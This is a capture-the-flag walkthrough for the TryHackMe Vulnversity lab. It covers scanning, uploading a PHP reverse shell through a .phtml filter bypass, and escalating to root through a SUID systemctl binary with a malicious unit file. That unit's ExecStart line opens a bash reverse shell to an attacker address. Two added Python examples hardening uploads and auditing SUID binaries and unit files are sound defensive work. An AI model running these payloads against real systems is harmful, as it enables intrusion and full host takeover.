TryHackMe: Vulnversity privilege escalation walkthrough
First, scan the target with Nmap:
# nmap -sV 10.10.66.138
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 06:43 EDT
Nmap scan report for 10.10.66.138
Host is up (0.26s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.94 seconds
Following the room's description, the next step is to enumerate the site's directories with gobuster:
(root💀kali)-[~/vulnhubs/vulnersity]
└─# gobuster dir --url http://10.10.66.138:3333/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.66.138:3333/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/22 06:49:04 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 320] [--> http://10.10.66.138:3333/images/]
/css                  (Status: 301) [Size: 317] [--> http://10.10.66.138:3333/css/]
/js                   (Status: 301) [Size: 316] [--> http://10.10.66.138:3333/js/]
/fonts                (Status: 301) [Size: 319] [--> http://10.10.66.138:3333/fonts/]
/internal             (Status: 301) [Size: 322] [--> http://10.10.66.138:3333/internal/]
The scan shows that the target has an /internal directory. Visiting it manually confirms that it is a file-upload page, so we can try to upload a PHP reverse shell.
However, the site filters the uploaded file type, so a .php file cannot be uploaded directly. According to the hint given later in the room, the .phtml extension passes the filter. After changing the extension, the PHP reverse shell was uploaded to the /internals/uploads directory and executed, and we get a shell:
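The filter described above is a deny-list: it blocks the one extension the developer thought of (.php) and lets every other PHP-handled extension through. The following is an added example, not code from the room or from this write-up's author, that puts a filter of that shape next to a hardened allow-list check. The function names and the set of permitted image extensions are assumptions made for the example.

```python
import os
import re

# Deny-list filter of the shape the write-up describes: it rejects ".php" and
# nothing else, so ".phtml" (which Apache's default PHP handler also executes)
# passes. Kept only to contrast with the hardened version below.
DENIED_EXTENSIONS = {".php"}

def weak_upload_check(filename: str) -> bool:
    """Return True if the deny-list filter would accept the file."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENIED_EXTENSIONS

# Hardened version: an allow-list of expected types (assumed here to be images),
# a file name reduced to a single safe component, and rejection of any name that
# carries a second extension, because Apache evaluates every dot-separated
# segment and a name such as "x.phtml.png" can still reach the PHP handler
# depending on the server configuration.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def strict_upload_check(filename: str) -> bool:
    """Return True only if the name is a single safe stem plus an allowed extension."""
    # Drop any directory component smuggled into the name.
    base = os.path.basename(filename.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem:
        return False            # no extension, or a dotfile such as .htaccess
    if "." in stem:
        return False            # double extension such as shell.phtml.png
    if not _SAFE_STEM.match(stem):
        return False            # unexpected characters in the stem
    return "." + ext.lower() in ALLOWED_EXTENSIONS

if __name__ == "__main__":
    for name in ("shell.php", "shell.phtml", "shell.phtml.png", "photo.PNG"):
        print(f"{name:18} weak={weak_upload_check(name)!s:5} strict={strict_upload_check(name)}")
```

The extension check is only one layer: the upload directory should additionally be served with PHP execution disabled (for example an Apache `<Directory>` block with `php_admin_flag engine off`, or no PHP handler mapped at all), so that a bypassed filter yields a file the server will not execute. The client-supplied Content-Type header is attacker-controlled and should not be used as a check.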
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.18.89.225] from (UNKNOWN) [10.10.66.138] 38612
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 07:00:22 up 18 min,  0 users,  load average: 0.00, 0.05, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
Next comes privilege escalation. Following the hint, we search for executables with the SUID bit set and find /bin/systemctl:
$ find / -user root -perm -4000 2> /dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cif
Next, write a root.service unit file on Kali Linux. It will be uploaded to the target and managed by systemctl, which is how we escalate privileges. The root.service file is as follows:
# cat root.service
[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.18.89.225/5555 0>&1'
[Install]
WantedBy=multi-user.target
The key part is bash's reverse shell command, which can be found in online resources.
Then start an HTTP server on Kali Linux so that the file can be downloaded to the target.
# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.66.138 - - [22/Apr/2022 07:09:49] "GET /root.service HTTP/1.1" 200 -
10.10.66.138 - - [22/Apr/2022 07:10:09] "GET /root.service HTTP/1.1" 200
Then run systemctl start on the target, which completes the privilege escalation:
$ systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
$ systemctl start /tmp/root.service
Failed to start tmp-root.service.mount: Unit tmp-root.service.mount not found.
$ systemctl start root
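Both halves of the escalation above leave artifacts a defender can check for: a SUID bit on a binary that should not have one (the `find` listing), and a unit enabled from a world-writable directory whose Exec line opens a network socket (the `systemctl enable` output). The following is an added example, not code from the room or from this write-up's author, that audits both. The SUID baseline, the function names and the sample inputs are assumptions made for the example; the constructed unit uses 192.0.2.10, a documentation address, in place of the attacker host.

```python
import posixpath
import re

# Constructed sample input: a subset of the SUID listing from the write-up,
# one path per line, as `find / -user root -perm -4000` prints it.
SUID_LISTING = """/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/bin/su
/bin/mount
/bin/umount
/bin/ping
/bin/systemctl
"""

# Baseline of binaries expected to carry the SUID bit. This set is an
# assumption for the example; in practice generate it from a clean reference
# install of the same distribution and compare every host against it.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}

def unexpected_suid(listing: str, baseline: set = EXPECTED_SUID) -> list:
    """Return the SUID paths in the listing that are not in the baseline."""
    return sorted(p for p in listing.split() if p not in baseline)

# Directories systemd normally loads unit files from. A unit enabled from
# anywhere else (such as /tmp) is a finding on its own.
UNIT_DIRS = (
    "/etc/systemd/system",
    "/run/systemd/system",
    "/lib/systemd/system",
    "/usr/lib/systemd/system",
)

_EXEC_LINE = re.compile(r"^Exec(?:Start|StartPre|StartPost|Stop|Reload)\s*=\s*(.+)$", re.M)
_USER_LINE = re.compile(r"^User\s*=\s*(\S+)", re.M)

def audit_unit(path: str, text: str) -> list:
    """Return human-readable findings for one unit file given its path and contents."""
    findings = []
    unit_dir = posixpath.dirname(posixpath.normpath(path))
    if not any(unit_dir == d or unit_dir.startswith(d + "/") for d in UNIT_DIRS):
        findings.append(f"unit loaded from non-standard directory: {unit_dir}")
    user = _USER_LINE.search(text)
    runs_as_root = user is None or user.group(1) == "root"   # no User= means root
    for m in _EXEC_LINE.finditer(text):
        cmd = m.group(1)
        if "/dev/tcp/" in cmd or "/dev/udp/" in cmd:
            findings.append(f"Exec line opens a raw network socket via bash: {cmd}")
        if re.search(r"(?:^|/)(?:ba|da)?sh\s+-c\b", cmd):
            findings.append(f"Exec line runs an inline shell command: {cmd}")
    if runs_as_root and findings:
        findings.append("unit runs as root (User=root or no User= line)")
    return findings

# Constructed sample: a unit shaped like the one in the write-up, with a
# documentation-range address standing in for the attacker host.
SAMPLE_UNIT = """[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/5555 0>&1'
[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for p in unexpected_suid(SUID_LISTING):
        print("unexpected SUID binary:", p)
    for f in audit_unit("/tmp/root.service", SAMPLE_UNIT):
        print("root.service:", f)
```

On a live host the two inputs come from `find / -perm -4000 -type f` and from the symlinks under /etc/systemd/system (the `Created symlink` lines above show exactly what `systemctl enable` leaves behind); the fix for the root cause is to clear the SUID bit from /bin/systemctl, which does not need it.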